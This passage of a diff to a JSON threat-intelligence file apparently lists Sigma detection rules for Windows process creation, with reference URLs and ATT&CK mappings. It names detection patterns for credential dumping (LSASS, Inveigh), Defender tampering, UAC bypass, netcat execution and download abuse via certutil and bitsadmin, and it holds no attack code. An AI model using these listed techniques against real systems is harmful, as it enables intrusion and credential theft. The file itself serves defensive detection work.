"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" ], "tags": [ @@ -34847,8 +44509,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://www.echotrail.io/insights/search/defaultpack.exe", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" ], "tags": [ @@ -34857,6 +44519,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2309017-4235-44fe-b5af-b15363011957", "value": "Lolbin Defaultpack.exe Use As Proxy" }, @@ -34874,10 +44545,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" ], "tags": [ @@ -34885,6 +44556,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "value": "Suspicious Csc.exe Source File Folder" }, @@ -34909,6 +44589,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "value": "Suspicious Execution of InstallUtil To Download" }, @@ -34934,6 +44623,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "value": "Inveigh Hack Tool" }, @@ -34961,6 +44659,22 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18739897-21b1-41da-8ee4-5b786915a676", "value": "GALLIUM Artefacts" }, @@ -34986,6 +44700,15 @@ "attack.g0069" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "value": "MERCURY Command Line Patterns" }, @@ -35010,6 +44733,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "value": "Suspicious Diantz Alternate Data Stream Execution" }, @@ -35035,6 +44767,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", "value": "Microsoft Outlook Product Spawning Windows Shell" }, @@ -35060,6 +44801,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "value": "UAC Bypass Tool UACMe Akagi" }, @@ -35086,6 +44836,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher" }, @@ -35110,6 +44869,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", "value": "Suspicious Execution of Taskkill" }, @@ -35158,6 +44926,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "value": "HandleKatz LSASS Dumper Usage" }, @@ -35174,11 +44951,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", "https://twitter.com/egre55/status/1087685529016193025", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" ], "tags": [ @@ -35195,6 +44972,22 @@ "attack.g0096" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", "value": "Suspicious Certutil Command Usage" }, @@ -35211,8 +45004,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" ], "tags": [ @@ -35268,6 +45061,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb", "value": "RAR Greedy Compression" }, @@ -35284,8 +45086,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" ], "tags": [ @@ -35293,6 +45095,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "value": "Suspicious Schtasks Schedule Type With High Privileges" }, @@ -35318,6 +45129,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" }, @@ -35334,8 +45154,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" ], "tags": [ @@ -35345,6 +45165,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", "value": "Windows Defender Download Activity" }, @@ -35372,6 +45208,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", "value": "Empire PowerShell UAC Bypass" }, @@ -35396,6 +45241,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Suspicious CMD Shell Redirect" }, @@ -35412,10 +45266,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ @@ -35426,6 +45280,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "value": "Bitsadmin Download to Uncommon Target Folder" }, @@ -35518,8 +45388,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ @@ -35552,6 +45422,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", "value": "Use of Scriptrunner.exe" }, @@ -35568,8 +45447,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -35577,6 +45456,15 @@ "attack.t1003.005" ] }, + "related": [ + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "value": "Cmdkey Cached Credentials Recon" }, @@ -35593,10 +45481,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ @@ -35607,6 +45495,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", "value": "Bitsadmin Download to Suspicious Target Folder" }, @@ -35631,6 +45535,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", "value": "Suspicious File Download via CertOC.exe" }, @@ -35647,12 +45560,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://attack.mitre.org/techniques/T1557/001/", - "https://github.com/ohpe/juicy-potato", "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" ], "tags": [ @@ -35660,6 +45572,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", "value": "SMB Relay Attack Tools" }, @@ -35685,6 +45606,15 @@ "attack.s0111" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", "value": "Defrag Deactivation" }, @@ -35711,6 +45641,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "value": "Netcat Suspicious Execution" }, @@ -35735,6 +45674,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4824fca-976f-4964-b334-0621379e84c4", "value": "Sysinternals SDelete Delete File" }, @@ -35751,9 +45699,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" ], "tags": [ @@ -35781,8 +45729,8 @@ "refs": [ "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" ], "tags": [ @@ -35790,6 +45738,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "value": "Empire PowerShell Launch Parameters" }, @@ -35832,8 +45789,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" ], @@ -35844,6 +45801,15 @@ "attack.t1087.002" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "value": "Suspicious Use of PsLogList" }, @@ -35860,9 +45826,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -35870,6 +45836,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", "value": "Use Short Name Path in Command Line" }, @@ -35894,6 +45869,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", "value": "Use of UltraViewer Remote Access Software" }, @@ -35918,6 +45902,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", "value": "Read and Execute a File Via Cmd.exe" }, @@ -35934,9 +45927,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], "tags": [ @@ -35947,6 +45940,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "value": "Bitsadmin Download File with Suspicious Extension" }, @@ -35971,6 +45980,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", "value": "WMIC Service Start/Stop" }, @@ -35995,6 +46013,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "value": "Suspicious Invoke-WebRequest Usage" }, @@ -36045,6 +46072,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "value": "Netsh Firewall Rule Deletion" }, @@ -36061,11 +46097,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/vysecurity/status/885545634958385153", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", - "https://twitter.com/Hexacorn/status/885570278637678592", "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ @@ -36073,6 +46109,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "value": "Suspicious Commandline Escape" }, @@ -36098,6 +46143,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "value": "Download Arbitrary Files Via PresentationHost.exe" }, @@ -36160,8 +46214,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ @@ -36193,6 +46247,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "value": "Net.exe User Account Creation - Never Expire" }, @@ -36233,6 +46296,7 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" ], "tags": [ @@ -36241,6 +46305,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", "value": "Monitoring Winget For LOLbin Execution" }, @@ -36289,6 +46362,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "value": "MSDT.EXE Execution With Suspicious Cab Option" }, @@ -36303,8 +46385,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" ], "tags": [ @@ -36313,6 +46395,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", "value": "Adwind RAT / JRAT" }, @@ -36338,6 +46436,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", "value": "Windows Credential Editor" }, @@ -36354,8 +46461,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/yosqueoy/ditsnap", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", 